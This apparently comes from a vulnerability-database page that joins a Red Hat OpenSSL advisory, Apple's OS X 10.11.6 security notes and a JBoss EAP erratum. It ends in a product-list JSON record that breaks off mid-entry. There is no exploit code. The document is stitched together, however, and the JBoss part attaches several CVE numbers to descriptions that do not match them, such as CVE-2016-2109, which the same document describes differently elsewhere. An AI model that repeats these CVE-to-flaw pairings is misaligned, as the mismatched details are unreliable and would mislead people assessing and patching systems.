It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when the connection used the AES CBC cipher suite and the server supported AES-NI. A remote attacker could possibly use this flaw to retrieve plain text from encrypted packets by using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-2107)
-
Several flaws were found in the way BIO_*printf functions were implemented in OpenSSL. Applications which passed large amounts of untrusted data through these functions could crash or potentially execute code with the permissions of the user running such an application. (CVE-2016-0799, CVE-2016-2842)
-
A denial of service flaw was found in the way OpenSSL parsed certain ASN.1-encoded data from BIO (OpenSSL's I/O abstraction) inputs. An application using OpenSSL that accepts untrusted ASN.1 BIO input could be forced to allocate an excessive amount of data. (CVE-2016-2109)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, and CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno Böck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as the original reporter of CVE-2016-2107.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-48.el6_8.1.src.rpm
i386: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-perl-1.0.1e-48.el6_8.1.i686.rpm openssl-static-1.0.1e-48.el6_8.1.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-48.el6_8.1.src.rpm
x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-48.el6_8.1.src.rpm
i386: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm
ppc64: openssl-1.0.1e-48.el6_8.1.ppc.rpm openssl-1.0.1e-48.el6_8.1.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.1.ppc.rpm openssl-devel-1.0.1e-48.el6_8.1.ppc64.rpm
s390x: openssl-1.0.1e-48.el6_8.1.s390.rpm openssl-1.0.1e-48.el6_8.1.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm openssl-devel-1.0.1e-48.el6_8.1.s390.rpm openssl-devel-1.0.1e-48.el6_8.1.s390x.rpm
x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-perl-1.0.1e-48.el6_8.1.i686.rpm openssl-static-1.0.1e-48.el6_8.1.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.1.ppc64.rpm openssl-static-1.0.1e-48.el6_8.1.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm openssl-perl-1.0.1e-48.el6_8.1.s390x.rpm openssl-static-1.0.1e-48.el6_8.1.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-48.el6_8.1.src.rpm
i386: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-perl-1.0.1e-48.el6_8.1.i686.rpm openssl-static-1.0.1e-48.el6_8.1.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-0799 https://access.redhat.com/security/cve/CVE-2016-2105 https://access.redhat.com/security/cve/CVE-2016-2106 https://access.redhat.com/security/cve/CVE-2016-2107 https://access.redhat.com/security/cve/CVE-2016-2108 https://access.redhat.com/security/cve/CVE-2016-2109 https://access.redhat.com/security/cve/CVE-2016-2842 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFXMXPXXlSAg2UNWIIRAmqpAJ4sxaxPc4fbLjR32h/PW1fxwOZG7ACgtaSz 6dbI0EemYRoHCDagPHSycq4= =g2Zb -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004
OS X El Capitan v10.11.6 and Security Update 2016-004 is now available and addresses the following:
apache_mod_php
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later
Impact: A remote attacker may be able to execute arbitrary code
Description: Multiple issues existed in PHP versions prior to
5.5.36. These were addressed by updating PHP to version 5.5.36.
CVE-2016-4650
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read was addressed through improved input validation. CVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro
Audio Available for: OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted audio file may lead to the disclosure of user information Description: An out-of-bounds read was addressed through improved bounds checking. CVE-2016-4646 : Steven Seeley of Source Incite working with Trend Micro's Zero Day Initiative
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro
bsdiff Available for: OS X El Capitan v10.11 and later Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An integer overflow existed in bspatch. This issue was addressed through improved bounds checking. CVE-2014-9862 : an anonymous researcher
CFNetwork Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to view sensitive user information Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed through improved restrictions. CVE-2016-4645 : Abhinav Bansal of Zscaler Inc.
CoreGraphics Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
CoreGraphics Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to elevate privileges Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
FaceTime Available for: OS X El Capitan v10.11 and later Impact: An attacker in a privileged network position may be able to cause a relayed call to continue transmitting audio while appearing as if the call terminated Description: User interface inconsistencies existed in the handling of relayed calls. These issues were addressed through improved FaceTime display logic. CVE-2016-4635 : Martin Vigo
Graphics Drivers Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4634 : Stefan Esser of SektionEins
ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to cause a denial of service Description: A memory consumption issue was addressed through improved memory handling. CVE-2016-4632 : Evgeny Sidorov of Yandex
ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
ImageIO Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports) CVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
Intel Graphics Driver Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4633 : an anonymous researcher
IOHIDFamily Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4626 : Stefan Esser of SektionEins
IOSurface Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A use-after-free was addressed through improved memory management. CVE-2016-4625 : Ian Beer of Google Project Zero
Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1863 : Ian Beer of Google Project Zero CVE-2016-1864 : Ju Zhu of Trend Micro CVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team
Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab (@keen_lab), Tencent
libc++abi Available for: OS X El Capitan v10.11 and later Impact: An application may be able to execute arbitrary code with root privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4621 : an anonymous researcher
libexpat Available for: OS X El Capitan v10.11 and later Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-0718 : Gustavo Grieco
LibreSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in LibreSSL before 2.2.7. These were addressed by updating LibreSSL to version 2.2.7. CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand, Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted XML document may lead to disclosure of user information Description: An access issue existed in the parsing of maliciously crafted XML files. This issue was addressed through improved input validation. CVE-2016-4449 : Kostya Serebryany
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxml2 Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4448 : Apple CVE-2016-4483 : Gustavo Grieco CVE-2016-4614 : Nick Wellnhofe CVE-2016-4615 : Nick Wellnhofer CVE-2016-4616 : Michael Paddon CVE-2016-4619 : Hanno Boeck
libxslt Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxslt Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1684 : Nicolas GrA(c)goire CVE-2016-4607 : Nick Wellnhofer CVE-2016-4608 : Nicolas GrA(c)goire CVE-2016-4609 : Nick Wellnhofer CVE-2016-4610 : Nick Wellnhofer CVE-2016-4612 : Nicolas GrA(c)goire
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to compromise of user information Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to the compromise of user information Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a denial of service Description: A memory initialization issue was addressed through improved memory handling. CVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to gain root privileges Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
OpenSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in OpenSSL. These issues were resolved by backporting the fixes from OpenSSL 1.0.2h/1.0.1 to OpenSSL 0.9.8. CVE-2016-2105 : Guido Vranken CVE-2016-2106 : Guido Vranken CVE-2016-2107 : Juraj Somorovsky CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter CVE-2016-2176 : Guido Vranken
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4596 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4597 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4600 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4602 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4598 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted SGI file may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4601 : Ke Liu of Tencent's Xuanwu Lab
QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4599 : Ke Liu of Tencent's Xuanwu Lab
Safari Login AutoFill Available for: OS X El Capitan v10.11 and later Impact: A user's password may be visible on screen Description: An issue existed in Safari's password auto-fill. This issue was addressed through improved matching of form fields. CVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD
Sandbox Profiles Available for: OS X El Capitan v10.11 and later Impact: A local application may be able to access the process list Description: An access issue existed with privileged API calls. This issue was addressed through additional restrictions. CVE-2016-4594 : Stefan Esser of SektionEins
Note: OS X El Capitan 10.11.6 includes the security content of Safari 9.1.2. For further details see https://support.apple.com/kb/HT206900
OS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y +cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy pSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV xj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u wevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN ZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k ah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk mmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC JM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc 55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs xPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5 YozOGPQFmX0OviWCQsX6 =ng+m -----END PGP SIGNATURE----- . Description:
Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.
This release includes bug fixes and enhancements, as well as a new release of OpenSSL that addresses a number of outstanding security flaws. For further information, see the knowledge base article linked to in the References section. (CVE-2016-2108)
-
Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from an HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks. (CVE-2015-3195)
-
A flaw was found in the way the TLS protocol composes the Diffie-Hellman exchange (for both export and non-export grade cipher suites). An attacker could use this flaw to downgrade a DHE connection to use export-grade key sizes, which could then be broken by sufficient pre-computation. This can lead to a passive man-in-the-middle attack in which the attacker is able to decrypt all traffic. (CVE-2016-2106)
-
It was discovered that it is possible to remotely Segfault Apache http server with a specially crafted string sent to the mod_cluster via service messages (MCMP). (CVE-2016-2109)
-
It was discovered that specifying configuration with a JVMRoute path longer than 80 characters will cause segmentation fault leading to a server crash.
The References section of this erratum contains a download link (you must log in to download the update)
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201605-0075", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2f" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2g" }, { "model": "enterprise linux hpc node eus", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "7.2" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "8.53" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "8.54" }, { "model": "secure global desktop", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "4.63" }, { "model": "secure global desktop", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "5.2" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "8.55" }, { "model": "secure global desktop", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "4.71" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "mysql", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "5.7.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "0.12.14" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "15.10" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "5.0.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "node.js", "scope": "eq", "trust": 1.0, "vendor": "nodejs", "version": "6.0.0" }, { "model": "mysql", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "5.6.30" }, { "model": "mysql", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "5.7.12" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "5.11.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "0.10.45" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1r" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "mysql", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "5.6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "0.10.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "4.4.4" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "4.0.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "4.2.0" }, { "model": "mac os x", "scope": "eq", "trust": 1.0, "vendor": "apple", "version": "10.11.5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "leap", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "42.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "16.04" }, { "model": "node.js", "scope": "lte", "trust": 1.0, "vendor": "nodejs", "version": "4.1.2" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "0.12.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all versions (linux)" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7)" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7)" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 6)" }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "enterprise linux hpc node eus", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7.2)" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle access manager 11.1.1.7" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0" }, { "model": 